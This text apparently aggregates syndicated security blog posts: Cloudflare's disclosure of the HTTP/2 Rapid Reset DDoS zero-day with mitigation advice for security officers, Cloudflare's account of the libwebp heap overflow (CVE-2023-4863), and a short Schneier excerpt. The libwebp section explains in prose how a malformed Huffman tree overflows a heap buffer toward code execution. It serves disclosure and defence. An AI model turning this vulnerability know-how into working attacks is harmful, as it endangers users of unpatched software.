Threat actors used botnets in tandem with the HTTP/2 vulnerability to amplify requests at rates we have never seen before. As a result, our team at Cloudflare experienced some intermittent edge instability. While our systems were able to mitigate the overwhelming majority of incoming attacks, the volume overloaded some components in our network, impacting a small number of customers’ performance with intermittent 4xx and 5xx errors — all of which were quickly resolved.

Once we successfully mitigated these issues and halted potential attacks for all customers, our team immediately kicked off a responsible disclosure process. We entered into conversations with industry peers to see how we could work together to help move our mission forward and safeguard the large percentage of the Internet that relies on our network prior to releasing this vulnerability to the general public.

We cover the technical details of the attack in more detail in a separate blog post: HTTP/2 Rapid Reset: deconstructing the record-breaking attack.

How is Cloudflare and the industry thwarting this attack?

There is no such thing as a “perfect disclosure.” Thwarting attacks and responding to emerging incidents requires organizations and security teams to live by an assume-breach mindset — because there will always be another zero-day, new evolving threat actor groups, and never-before-seen novel attacks and techniques.

This “assume-breach” mindset is a key foundation towards information sharing and ensuring in instances such as this that the Internet remains safe. While Cloudflare was experiencing and mitigating these attacks, we were also working with industry partners to guarantee that the industry at-large could withstand this attack.  

During the process of mitigating this attack, our Cloudflare team developed and purpose-built new technology to stop these DDoS attacks and further improve our own mitigations for this and other future attacks of massive scale. These efforts have significantly increased our overall mitigation capabilities and resiliency. If you are using Cloudflare, we are confident that you are protected.

Our team also alerted web server software partners who are developing patches to ensure this vulnerability cannot be exploited — check their websites for more information.

HTTP/2 Zero-Day Vulnerability Results in Record-Breaking DDoS Attacks

Disclosures are never one and done. The lifeblood of Cloudflare is to ensure a better Internet, which stems from instances such as these. When we have the opportunity to work with our industry partners and governments to ensure there are no widespread impacts on the Internet, we are doing our part in increasing the cyber resiliency of every organization no matter the size or vertical.

To gain more of an understanding around mitigation tactics and next steps on patching, register for our webinar.

What are the origins of the HTTP/2 Rapid Reset and these record-breaking attacks on Cloudflare?

It may seem odd that Cloudflare was one of the first companies to witness these attacks. Why would threat actors attack a company that has some of the most robust defenses against DDoS attacks in the world?  

The reality is that Cloudflare often sees attacks before they are turned on more vulnerable targets. Threat actors need to develop and test their tools before they deploy them in the wild. Threat actors who possess record-shattering attack methods can have an extremely difficult time testing and understanding how large and effective they are, because they don't have the infrastructure to absorb the attacks they are launching. Because of the transparency that we share on our network performance, and the measurements of attacks they could glean from our public performance charts, this threat actor was likely targeting us to understand the capabilities of the exploit.

But that testing, and the ability to see the attack early, helps us develop mitigations for the attack that benefit both our customers and industry as a whole.

From CSO to CSO: What should you do?

I have been a CSO for over 20 years, on the receiving end of countless disclosures and  announcements like this. But whether it was Log4J, Solarwinds, EternalBlue WannaCry/NotPetya, Heartbleed, or Shellshock, all of these security incidents have a commonality. A tremendous explosion that ripples across the world and creates an opportunity to completely disrupt any of the organizations that I have led — regardless of the industry or the size.

Many of these were attacks or vulnerabilities that we may have not been able to control. But regardless of whether the issue arose from something that was in my control or not, what has set any successful initiative I have led apart from those that did not lean in our favor was the ability to respond when zero-day vulnerabilities and exploits like this are identified.    

While I wish I could say that Rapid Reset may be different this time around, it is not. I am calling all CSOs — no matter if you’ve lived through the decades of security incidents that I have, or this is your first day on the job — this is the time to ensure you are protected and stand up your cyber incident response team.

We’ve kept the information restricted until today to give as many security vendors as possible the opportunity to react. However, at some point, the responsible thing becomes to publicly disclose zero-day threats like this. Today is that day. That means that after today, threat actors will be largely aware of the HTTP/2 vulnerability; and it will inevitably become trivial to exploit and kickoff the race between defenders and attacks — first to patch vs. first to exploit. Organizations should assume that systems will be tested, and take proactive measures to ensure protection.

To me, this is reminiscent of a vulnerability like Log4J, due to the many variants that are emerging daily, and will continue to come to fruition in the weeks, months, and years to come. As more researchers and threat actors experiment with the vulnerability, we may find different variants with even shorter exploit cycles that contain even more advanced bypasses.  

And just like Log4J, managing incidents like this isn’t as simple as “run the patch, now you’re done”. You need to turn incident management, patching, and evolving your security protections into ongoing processes — because the patches for each variant of a vulnerability reduce your risk, but they don’t eliminate it.

I don’t mean to be alarmist, but I will be direct: you must take this seriously. Treat this as a full active incident to ensure nothing happens to your organization.

Recommendations for a New Standard of Change

While no one security event is ever identical to the next, there are lessons that can be learned. CSOs, here are my recommendations that must be implemented immediately. Not only in this instance, but for years to come:

  • Understand your external and partner network’s external connectivity to remediate any Internet facing systems with the mitigations below.
  • Understand your existing security protection and capabilities you have to protect, detect and respond to an attack and immediately remediate any issues you have in your network.
  • Ensure your DDoS Protection resides outside of your data center because if the traffic gets to your datacenter, it will be difficult to mitigate the DDoS attack.
  • Ensure you have DDoS protection for Applications (Layer 7) and ensure you have Web Application Firewalls. Additionally as a best practice, ensure you have complete DDoS protection for DNS, Network Traffic (Layer 3) and API Firewalls
  • Ensure web server and operating system patches are deployed across all Internet Facing Web Servers. Also, ensure all automation like Terraform builds and images are fully patched so older versions of web servers are not deployed into production over the secure images by accident.
  • As a last resort, consider turning off HTTP/2 and HTTP/3 (likely also vulnerable) to mitigate the threat.  This is a last resort only, because there will be a significant performance issues if you downgrade to HTTP/1.1
  • Consider a secondary, cloud-based DDoS L7 provider at perimeter for resilience.

Cloudflare’s mission is to help build a better Internet. If you are concerned with your current state of DDoS protection, we are more than happy to provide you with our DDoS capabilities and resilience for free to mitigate any attempts of a successful DDoS attack.  We know the stress that you are facing as we have fought off these attacks for the last 30 days and made our already best in class systems, even better.

If you’re interested in finding out more, we have a webinar coming up with more details on the zero-day and how to respond; you can register here. We also have more technical details of the attack in more detail in a separate blog post: HTTP/2 Rapid Reset: deconstructing the record-breaking attack. Finally, if you’re being targeted or need immediate protection, please contact your local Cloudflare representative or visit https://www.cloudflare.com/under-attack-hotline/.

Uncovering the Hidden WebP vulnerability: a tale of a CVE with much bigger implications than it originally seemed

Post Syndicated from Willi Geiger original http://blog.cloudflare.com/uncovering-the-hidden-webp-vulnerability-cve-2023-4863/

Uncovering the Hidden WebP vulnerability: a tale of a CVE with much bigger implications than it originally seemed

Uncovering the Hidden WebP vulnerability: a tale of a CVE with much bigger implications than it originally seemed

At Cloudflare, we're constantly vigilant when it comes to identifying vulnerabilities that could potentially affect the Internet ecosystem. Recently, on September 12, 2023, Google announced a security issue in Google Chrome, titled "Heap buffer overflow in WebP in Google Chrome," which caught our attention. Initially, it seemed like just another bug in the popular web browser. However, what we discovered was far more significant and had implications that extended well beyond Chrome.

Impact much wider than suggested

The vulnerability, tracked under CVE-2023-4863, was described as a heap buffer overflow in WebP within Google Chrome. While this description might lead one to believe that it's a problem confined solely to Chrome, the reality was quite different. It turned out to be a bug deeply rooted in the libwebp library, which is not only used by Chrome but by virtually every application that handles WebP images.

Digging deeper, this vulnerability was in fact first reported in an earlier CVE from Apple, CVE-2023-41064, although the connection was not immediately obvious. In early September, Citizen Lab, a research lab based out of the University of Toronto, reported on an apparent exploit that was being used to attempt to install spyware on the iPhone of "an individual employed by a Washington DC-based civil society organization." The advisory from Apple was also incomplete, stating that it was a “buffer overflow issue in ImageIO,” and that they were aware the issue may have been actively exploited. Only after Google released CVE-2023-4863 did it become clear that these two issues were linked, and there was a wider vulnerability in WebP.

The vulnerability allows an attacker to create a malformed WebP image file that makes libwebp write data beyond the buffer memory allocated to the image decoder. By writing past the legal bounds of the buffer, it is possible to modify sensitive data in memory, eventually leading to execution of the attacker's code.

WebP, introduced over a decade ago, has gained widespread adoption in various applications, ranging from web browsers to email clients, chat apps, graphics programs, and even operating systems. This ubiquity meant that this vulnerability had far-reaching consequences, affecting a vast array of software and virtually all users of the WebP format.

Uncovering the Hidden WebP vulnerability: a tale of a CVE with much bigger implications than it originally seemed
How the WebP vulnerability is exploited

Understanding the technical details

So what exactly was the issue, how could it be exploited, and how was it shut down? We can get our best clues by looking at the patch that was made to libwebp. This patch fixes a potential out-of-buffer (OOB) error in part of the image decoder – the Huffman tables – with two changes: additional validation of the input data, and a modified dynamic memory allocation model. A deeper dive into libwebp and the WebP image format built on top of it reveals what this means.

WebP is a combination of two different image formats: a lossy format similar to JPEG using VP8 codec, and a lossless format using WebP's custom lossless codec. The bug was in the lossless codec's handling of Huffman coding.

The fundamental idea behind Huffman coding is that using a constant number of bits for every basic unit of information in a dataset – like a pixel color – is not the most efficient representation. We can use a variable number of bits, and assign shortest sequences to the most frequently occurring values, and longer ones to the least common values. The sequences of ones and zeros can be represented as a binary tree, with the shorter, more common codes near the root, and longer, less common codes deeper in the tree. Looking up values in the tree bit by bit is relatively slow. Practical implementations build lookup tables that allow matching many bits at a time.

Image files contain compact information about the shape of the Huffman tree, which the decoder uses to reconstruct the tree, and build lookup tables for the codes. The bug in libwebp was in the code building the lookup tables. A specially crafted WebP file can contain a very unbalanced Huffman tree that contains codes much longer than any normal WebP file would have, and this made the function generating lookup tables write data beyond the buffer allocated for the lookup tables. Libwebp had checks for validity of the Huffman tree, but it would write the invalid lookup tables before the consistency check.

The buffer for lookup tables is allocated on the heap. Heap is an area of memory where most of the data of the application is stored. Code that writes data past its buffer allows attackers to modify and corrupt data that happens to be adjacent in memory to the buffer. This can be exploited to make the application misbehave, and eventually start executing code supplied by the attacker.

The fixed version of libwebp ensures that the input data will always create a valid internal structure, and if so, allocates more memory if necessary to ensure the buffer is always big enough.

Libwebp is a mature library, maintained by seasoned professionals. But it's written in the C language, which has very few safeguards against programming errors, especially memory use. Despite the care taken in the library's development, a single erroneous assumption led to a critical vulnerability.

Swift action

On the same day that Google's announcement caught our attention, we filed an internal security ticket, to document and address the vulnerability.

Google was initially perplexed about the true source of the problem. They did not release a patched version of libwebp before announcing the vulnerability. We discovered the yet-unreleased patch for libwebp in its repository, and used it to update libwebp in our services. libwebp officially released the patch a day later.

Our image processing services are written in Rust. We've submitted patches to Rust packages that contained a copy of libwebp and filed RustSec advisories for them (RUSTSEC-2023-0061 and RUSTSEC-2023-0062). This ensured that the broader Rust ecosystem was informed and could take appropriate action.

In an interesting turn of events, GitHub's vulnerability scanner was quick to recognize our RustSec reports as the first case of CVE-2023-4863, even before the issue gained widespread attention. This highlights the importance of having robust security reporting mechanisms in place and the vital role that platforms like GitHub play in keeping the open-source community secure.

These quick actions demonstrate how seriously Cloudflare takes this kind of threat. We have a belt-and-suspenders approach to security that limits the binaries we run at our edge to those signed by us, and ensures that all vulnerabilities are identified and remedied as soon as possible. In this case, we have scrutinized our logs, and found no evidence that any attackers attempted to leverage this vulnerability against Cloudflare. We believe this exploit targeted individuals rather than the infrastructure of a company like Cloudflare, but we never take chances with our customers’ data, and so fixed this vulnerability as quickly as possible, before it became well known.

Conclusion

Google has now widened its description of this issue, correctly calling out that all uses of WebP are potentially affected. This widened description was originally filed as yet another new CVE – CVE-2023-5129 – but then that was flagged as a duplicate of the original CVE-2023-4863, and the description of the earlier filing updated. This incident serves as a reminder of the complex and interconnected nature of the internet ecosystem. What initially seemed like a Chrome-specific problem revealed a much deeper issue that touched nearly every corner of the digital world. The incident also showcased the importance of swift collaboration and the critical role that responsible disclosure plays in mitigating security risks.

For each and every user, it demonstrates the need to keep all browsers, apps and operating systems up to date, and to install recommended security patches. All applications supporting WebP images need to be updated. We've updated our services.

At Cloudflare, we remain committed to enhancing the security of the internet, and incidents like these drive us to continually refine our processes and strengthen our partnerships within the global developer community. By working together, we can make the Internet a safer place for everyone.

Critical Vulnerability in libwebp Library

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/09/critical-vulnerability-in-libwebp-library.html

Both Apple and Google have recently reported critical vulnerabilities in their systems—iOS and Chrome, respectively—that are ultimately the result of the same vulnerability in the libwebp library:

On Thursday, researchers from security firm Rezillion published evidence that they said made it “highly likely” both indeed stemmed from the same bug, specifically in libwebp, the code library that apps, operating systems, and other code libraries incorporate to process WebP images.

Rather than Apple, Google, and Citizen Lab coordinating and accurately reporting the common origin of the vulnerability, they chose to use a separate CVE designation, the researchers said. The researchers concluded that “millions of different applications” would remain vulnerable until they, too, incorporated the libwebp fix. That, in turn, they said, was preventing automated systems that developers use to track known vulnerabilities in their offerings from detecting a critical vulnerability that’s under active exploitation.